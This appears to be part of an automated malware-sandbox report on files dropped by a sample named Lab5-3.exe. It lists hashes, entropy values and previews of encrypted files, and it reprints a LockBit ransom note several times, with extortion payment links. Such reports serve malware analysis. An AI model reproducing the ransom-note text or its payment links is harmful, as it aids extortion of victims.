                                                                                                          Preview:...x)G&b...t.i...#....=x..QJ..c..;9v..bn.h.....I..0#....=...|..2.......9yG...G.2.Cz..W...z...:...!9....N].D.%.-.a..c..u..Y.@Z.@.I.iw..?...d$..:......*r.....w....=I.P/..a....W.2(B.y.....mF.8..G>9....d....Ah.Q...r!J.\Q(45....WI.......(.......;z...)..}.-l.X.......\...R.bd'..=.+...N....|....v..s.p.r..&q+.....t.....m#.y.s_y......v.G..Cy8^..g?.w..*...D..4^......Pn].%.S..tY(.L.H.1.X>...|.#>..>c@..O.i.q..]...t.....Q0..k..@.-..F4K0...S..3.-T%].....1...?.4sh.J.....B...7%.....DM@..=....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1776
                                                                                                          Entropy (8bit):7.913563058146339
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:NWG8IOGTaHfUTid3hBaUoSGFcmeykEdEElU92i:Z8XA1Gx0uKeY2ElUJ
                                                                                                          MD5:3C61814304E41E9D5D622C4798D1DE50
                                                                                                          SHA1:D18CEA73A81EE7264D1E4150404E568A408E52C7
                                                                                                          SHA-256:F4FAACA86D841123BB342AFE439570EB9903BAD5A1002F38FE4D9344CD5D54BA
                                                                                                          SHA-512:9B0266E2985030B09BE447971171DF7BC2361FF89763EFC422D757F5E674D9EE1D40DD4A214F1D40F17E8E8253412B171F9D58D457B3CAC01DB63C80C1C7F035
                                                                                                          Malicious:false
                                                                                                          Preview:Y>]|/.e].6....M.X..%..e^...`.{u#,.`.......A.P.....jI.8......Y.Q.......$Fp.+A.*...M..............&*.Wq....n.x.qmR7S.g.'.@....}.[d...L..0\.>.....WB.(....9n.....S.TBZZT)..R.8.VM...J....N........B.B.#}:,........!R..d.0.*..B.z..=.8.~~z..9.z`.#....K.. .d*q..Ug:.0.... .l...Wq.:...U....X.5.|{....Nh]..#...F......Ri#..w.x..L..b+.../'.DT..1..N f..f>\.+.ZOY.......i..-....5zU....e....V..+a.\..ZV.ie.eD?K...{...t8;.f..Dd<.uf....P.qE.....Bw.X.${4...Cg.h..B+:..ZwR.....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.n
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1760
                                                                                                          Entropy (8bit):7.9034638893769875
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:scnYzfHfUTid3hBaUoSGFcmeykEdEElU92i:ckGx0uKeY2ElUJ
                                                                                                          MD5:D89559F8C12501C313095F2A57D76B7D
                                                                                                          SHA1:6D9979CC40DA2C733B849780F94963317FF57676
                                                                                                          SHA-256:EEAC1F1E894E59343D11EBFFFFD7483FE5C5BBACE2701DB0F62D4551A6F9C867
                                                                                                          SHA-512:68983377E7B9D5FEE4EB445341ABB23BB06215231CB55F7B698B82C2A7DF0E07A0B47DE5C831CBE6E760D522A4E4B9C2851DBB61F4EFB21BDFF39C90C97E10DF
                                                                                                          Malicious:false
                                                                                                          Preview:.N..N?.......x..(.|...,..9.....+sz..o.01b...RK>j&d.6..0...uZX[y.T.t.i....r\.#;B}!.T..R.RS.5%.c..s.7.s.._.J.q..CdG.]...j..\%.e..s..y.-..xd..%......&.l!.&....sL<?5].n7.U.;j.^..3.....\U.<....P#un..l}&W"[..GEw...K..S.A_W.&f.r.YQ.NF.i.p.2.$....!..`t......].{..c........G.?...z..U..1.L.H.....#......"l"n:.z...~.0......(..w.O%.<[....~#......2....[..:^..B.=...(z.q.E.}..G.$.G.W.{...X...+...Z.....l5~>...V.6.u.....*..;....&...+N;.e...bu.r.h....Y....T..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1776
                                                                                                          Entropy (8bit):7.892463794277962
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:PAYghwQaDlM1BHfUTid3hBaUoSGFcmeykEdEElU92i:yhx6lGx0uKeY2ElUJ
                                                                                                          MD5:59AD8E77202C6BFB1806E9B5B2D66307
                                                                                                          SHA1:F834C7525514050D0F3E7A9CA70E167CA0543038
                                                                                                          SHA-256:5AE6C7EAB09F1E5559630C9DBCB79BFE7793FDFE0E8F1FEB5ABC3685AE40E15E
                                                                                                          SHA-512:21A6CA12873F1F2DC7DB2DE2251CB949719AE8F3E0B5ED104354C233170CE8BD945CCEF8032AF7C5651C7CCAA15A4BE4E26A74BD598AFD3DC5294AA54232A8AE
                                                                                                          Malicious:false
                                                                                                          Preview:....;A...^r"....=....#...*.._.a.|-..&..?.].R...*.Q_....<>K.r.f....vD.zP...d..1...L..7.|eL..>.c.f..4,..9..:..wQu..e....f.Ue8c.O.mm....&...z.".f.c.."&..|o..G....28l..}..SL2m.....Q.N8o..H..M~.6..J.c+.M)..n.........ks.|.0...?c..B.zJg.V.&......Zo$..q_.a..>j..sf8.4?..... .O...%.7V8H%e..P...i8...e..q.L..m0H.>.~K.t...6.YB...k..\'...P....S.%...(x..,...ql....(C..`I.......l0J...k..rN7.3!..f&..(.J9....o...pJ........Z.U.TP/..;E9.+..O..0..n...=...2..Wq..U.;....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.n
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1792
                                                                                                          Entropy (8bit):7.8979413754970675
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:iC1E5iN71bkfJOEHfUTid3hBaUoSGFcmeykEdEElU92i:iR5iTjGx0uKeY2ElUJ
                                                                                                          MD5:B22AFDED2F037211437E2823A8160D97
                                                                                                          SHA1:B506FA7CF8CCFDDD1C6162F04A2372F963C49F56
                                                                                                          SHA-256:0ADD0B272594DA7D51F50BE0DA82AC9B62B784256DF0F2E3793F19C79E496DBC
                                                                                                          SHA-512:07011357295EA7FE4986494AEC3A1F6FDD19881DC84F56BC9759856F6E5CB18FFB5381079E50EFD5951752E9B6868798AACAEE7CB015F3F4DD2E8B6DC6F90970
                                                                                                          Malicious:false
                                                                                                          Preview:=....W/...|Z.+-..C.1X..r...3.5d......0+ZNtJo..!Fq1..\.J.e...z..M.....t.um..`_?..:d...<.p.~..d."..."WtS3[{..!...@N........m...ic..s}...G...^r.5rW/.zN.^..M.{p]/.;..5..5....,.....&Xqpe..s.W.../.Y..1.!n.'.}].K..Q[.*...3.].......z.Q.q...or....T....r...I..z'.......D..]=.$<.j.....j/.&4........9...mXb.....n4.zG.jr.?#:..^.K.....b..y.......D..z...}.1.*..*.T..O..C.[.6.(..u.a....s.cGV.....mq.&..Z\.1...v....y.:GL6.0.he.H........_CX.....6...g..BI.H._`..0......./../..R....]3...<N...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1776
                                                                                                          Entropy (8bit):7.893466298579031
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:z/aj8EGtKNnxHfUTid3hBaUoSGFcmeykEdEElU92i:zaj8EGIcGx0uKeY2ElUJ
                                                                                                          MD5:0E9402B16A903813DB3B2B3E227724F8
                                                                                                          SHA1:07965BB1E421C3D28D1A6ACF93751172DF2648DA
                                                                                                          SHA-256:4F28C3C6FF039509A56ECCE7B557C5789EFC3E8D8A9F2106C10E65AA12142506
                                                                                                          SHA-512:AD8317B34B76036A2DD15725644B0CF8388718C24725F3F2016DE3CB0E34B9C6DAA79EB34C49F15BE25BEF0FE939053895B23243FBE162CBFCD5F7C74F3AEF16
                                                                                                          Malicious:false
                                                                                                          Preview:.3..-.!=x N...S...d..46n..E/...1mk...3.k6.YXX..U..u;...._.`...$.14p.P#...<...... F.w.....=....^?...........I...L...g.t.Pw+....p.2...m..}z.8..Z.D....N.....aF.......%.^.!.....G9....5_*M.E0...Z]..t..F....&.....^M.6)...T........m:.X..u..7.......Y.W#.....~6...v..D.o.......L....V.w~....%...yT2..g.[..bs..w.*Gl.Pn....U..L..o`..k.;3.A...#N`(.mz......j=.i(A904g..,.3..*.+.../SW%p...q.G....9.a>..F..+.D..w..]J#.....}\M.M.L..N#.d ..J.[a...rsj5.*....A.*w.jP._..,....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.n
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2800
                                                                                                          Entropy (8bit):7.93678236927988
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:w66eTxNf1rWr02SaCYNxOI1IHeaXMlzHfUTid3hBaUoSGFcmeykEdEElU92i:wtyi0DaYkipGx0uKeY2ElUJ
                                                                                                          MD5:A86B763CACFEE033EC6F7438241CD9F4
                                                                                                          SHA1:9C415A1E081ABB12D1C325A596CFAD6DDECC95A8
                                                                                                          SHA-256:243E4286DE35CE9A623EF48E55AD7EB71220D2C142DA52A2A553ECE47714AEA2
                                                                                                          SHA-512:93AEC82FF1976871275D71F745F1146A888CF71C977C5F6237C97050039A21AE5BEC2A367645BF90A9F3D3A4CA15665A429E60BB1BD06A57ED023FB3BAFFA021
                                                                                                          Malicious:false
                                                                                                          Preview:]<.(.N|....W...rny}....`........./-9B.0.6i.v...a...=...t_...4+5tVOm.hS....-j...,Ps.[.mmZH..~Xe....{.....6m..rr_.Ph8.#uV...KhE.p....4.@...=.z...u!./...+....a5.........E.=Ym.ZP..#......C.....}......4.....a......|..IS.....Sh.1{`A.}.tC..K.W........:..H.4.ybf^..)[.ub........x...%.p|.....Q.Zdd..S'..l..Z.y9:S....2e.^..{....E.z."...;.g.J.t.q|....~m.......<.!G.....7..F.K>./..Fg..n..".y.%o..y.....d-NaA.'..n.f.wF+......t..[p...aIC....m.H8...q,R..#7......?52.iN@...N~X.j...X.m=pW<..c.g....K.Z...~.*.!.j.F..........`q&.]S.M...k....o.E........C_$....,...._....>u..j..i..r..@Y.d6y....~^o.F'..K.. $,..I.o.VgD.P....S...a~RD#...:.U~....9..J................qV.....&.$..'.....KTO.#.r&.5..V.ov...i..:D..8.$.C.;&J..q...1..0.i....I..T.\.f....3....q......*.._.B.f|.Z.F...k. ..4n....j.'S.m.....>p.J.b..CH'12.#..1./..7d......KS._zY..~...l......LT.....JOL.p.Uo.*..h.U...B.3.Uh`...2.-...r./.\.v.e_pT.?.@7..f.iQ...N...5...Xej7Q...}.b..N...z.....D}isQ....-.:.Wm[.j....dF....qJ.0..#T.I
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):186656
                                                                                                          Entropy (8bit):7.998878748518563
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:MJq7lirSsFC2XNjrFLvmf3b9wpyfH+dSfsgaaMqz3BDQjSYS1Gqu4STLpuKx4PeT:ioMWP29jrFLOf36pyfHeaRDQjSpAquDv
                                                                                                          MD5:870D25B84F843B69B3CAD0C3E74C6901
                                                                                                          SHA1:A80ADC56DD1DE330E5ED56F0E7F3B03BD34A2418
                                                                                                          SHA-256:E9AB788C26E2CD2F45B544BEE7AA1EAF8D6B5EDFB681E8C9E02D2AC41DBE79AC
                                                                                                          SHA-512:BDBF6EB6DE08E6450AEF7E78C4CF795A94F5B17EA0A56808A723A3438BCB3732355B36950CE7A49FA56F65DEB3D4CA78780F6A03235926DB01A0B321C3E621F3
                                                                                                          Malicious:true
                                                                                                          Preview:..XF.......A........{.=t.Zu....M......sf.d.)..|..9C4.9......9U....!=.....K...,M.<Ha&..../........1dY8..4.[..\.....,Q...4@.~l..Q....e......c..Z..T\..~....'.....x.KTr.!...;/.7\U2D.V...aJ@.....!u...K[A..`k.....&......7..*...da...!0.dM...E.q.*......QL.^..R.......[..h.>....9.-..=0 .9..!v..%m%..Q.....Ef...c.P.N....P...Ql.....;F.)}...#.......gR.....G.w...C...,... ..z.n..F..W4...9.<<5.....'.r.:]...KO...7..M.Z.....x............n..T%.E1G.....W.I.....b=...`..g..0$FaHh.d..l.:..p.q..E).'V.?a.jpGpu.~.z..R..F""...k<........z.M....m.*0.`X.{....m l..D#.;8?..B...-..+...a.}.Y%.Q...(......c.On.....[.#.2k.T..........(..NwMb_6.K9D.|.N.B...m..'..o....j.9..V..Z.W@p.S.h ...4....=..A.&..1.p..........#.p..W...$.|..L.....}x.2NG.".Fq}..^..tl'X~.....ES(d....A%k..f....vC1.:.Q.|.tf....k..X..XI.......:...~....w.d.k..l......IO.X.x.eA.-.].+.w.*.....S..9..#.D.;.......b........z...H;..|.<u..%...Q....O.E..!.dB.l.l./6.2E....C...2.2.....YKzg.d..h0/.^...:Q...i._K..2R.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12432
                                                                                                          Entropy (8bit):7.985068757414189
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:C1K7c+/RXBL6GSrMghNfkVSvko3O0cTfRmlwGuvdfcfeKjNkxa76RWeB0Cb:C10ZZ6GKNfkVSvkxT4J2dkRjKy6kitb
                                                                                                          MD5:43A95696A524F75653C80341C26BCA38
                                                                                                          SHA1:E19EA61B6BA963EE8D02E33064992F6B787F3A40
                                                                                                          SHA-256:CD449A7D83D05DE9F9AFC6F3CBC47A36208E71160CBBE88AEAB8707E87BDB244
                                                                                                          SHA-512:23BF6F3FED52B5D748A0FA8543012714AFF41A7F708DE4159C5BA404E2ECB7066F51403082C4EC93949B2976191304355152C5761AE39DBDB39F3F47EA848546
                                                                                                          Malicious:false
                                                                                                          Preview:.h.y...B..8&j. \...J"..\..Z...04ts.......Zq.$........b..N3%>K...#.nu|.....nnB.Y.>.u..H...4...Y.......V%..>...s...NP.>B..].a.y.v%.a.......@.d...m.V.V.5.....l%~;.8.]../.....E..R.*...J,..*..~..4/...^W).o..Ri....u{.p.f.J.; )..u.......>T..5..5..E...@.Vh.l: ...... ...4-...+.......w.6.H..[..t.S+>..x.....n..f.$...U.O. E.....UB$..hF...8/P.c.W1k.Q{q. ..||..&.!Q..+h..'.U.:_y.).....L.?2.$.a..X.q%....{..c.N.&.\.....2.t.......v...a.4.T..EP~..8.Yf.D...6...X.==....Q.y.|..k..K3..=<..C.+..SN`iL.KcI^h...+D...........[...U..z...*.....\..;v..[......p$T....Sb.UQ...w1>S..M.....V*#!.k..#..<3D....O.....y...B.4e..s.}...en...!:n... {#...&"6f.+Ee..Et.`...S*...l..2..3%..]....G........D=1\.bF..9..#.+.`n[.q.{..f.t.SB...(.;)..#..n..Y...*X.R........\.6..1.*Vi;..Wh...b...b...k.AC2J..f.:0i8.yI..G.........fw.n..5E9{.!.;$3....d...A{J.....t=..D~.........=h....a./.q.,,..H...m..n$.G$s...?pk....z.....#H..q.M.mx*..Wv..A Op.Db4...T.-].g..O.,.......0F...O....9c-.E.<^yx..F.....X).
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):244752
                                                                                                          Entropy (8bit):7.999266292867043
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:6144:QQKhC44waloHnddAOh4V+38IDluOtgepWZ:msni9djhSbuluOGeo
                                                                                                          MD5:12C42BE3ED3F0BC2FD570DC75CC85E4C
                                                                                                          SHA1:ECEABD6A90B7FB5D4EF44CF8A91C1A9446A797AF
                                                                                                          SHA-256:271024C6E22FF48D65D38FA75F9973F5CC7A5EF03175E8023E80D777EEDC1A59
                                                                                                          SHA-512:78938CA190EBEDB48CC359E1E6B67A7ADA753B15ABD2B1A12C69E94E29123F364C68B52987687114D50485ACB94FDFF98FAC75DC13A4163AEAF7227D4C8CB3DE
                                                                                                          Malicious:true
                                                                                                          Preview:.a........0.....,..q..0.~hK8..l0.K....|T..(..c...(....].k.....4%n...4.'Z....;..V..b...Os!j.".m...N...l o..\.0.....V.H{.....X.....M.:..Y...P#.deT......$~qF.,.5....U.>.9-.s..A.$0....ZR.7.....].x.%....Wy30.iN.{Or7...m...2{`>...-.....T...{>..N.4.a.T.n.C.7..F'..(F....zg.....y5...^......+8O^2.2v}..c.u|.d.....I.....1..W......s..o.{.TS...w1.ZI.l_.W..+5#e....h2.(F.. ..zG..-..-b.C..Q'.{G8.z...........D.R......y.&..W..<|u..z+.ve.5,].....Qo.....D.6;.+.8.\k.M.N/)..[...i...bm.&.....L.jQ.........B.7A....H.:.Z.....3.......c<...............=L....Nq..tw.....+.....2.&X{.o......AY.s-$.......x1.....9..9...9#.....G\..D......*.....1.......'^4D_z...k.K%.....{F3.pk.....W=.m|7...q...W....v.9...ug...T.ie4..$.Z....[.~.%\....L..yy..._n.Y<.A'..b.<..0{.b...........Hb.1.....`...FBK..V....8:(.|a..8.U8..an=.k.m......>....w....j<{O/.......6....m..0.....vW..l.3.OZ.v..?..T{..........V{.....h..Y.4..w....K....R.t..x..."..[........^..B....n...u,C......N.Jjyp".Tj+.T.]f..N7.q>..U
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1856
                                                                                                          Entropy (8bit):7.889132021947291
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:1y60i2IUA3XfOl/4HfUTid3hBaUoSGFcmeykEdEElU92i:1y60qUA3yfGx0uKeY2ElUJ
                                                                                                          MD5:9DCAFDA541C882DF8C410BECDE9EEE2D
                                                                                                          SHA1:1E2365B9FDE4C8AAFF9FFFD9088DE849B1884449
                                                                                                          SHA-256:044D2140295B5F6C2FB2968B8E867B6F5C84E14709DC413D6D229D6279103747
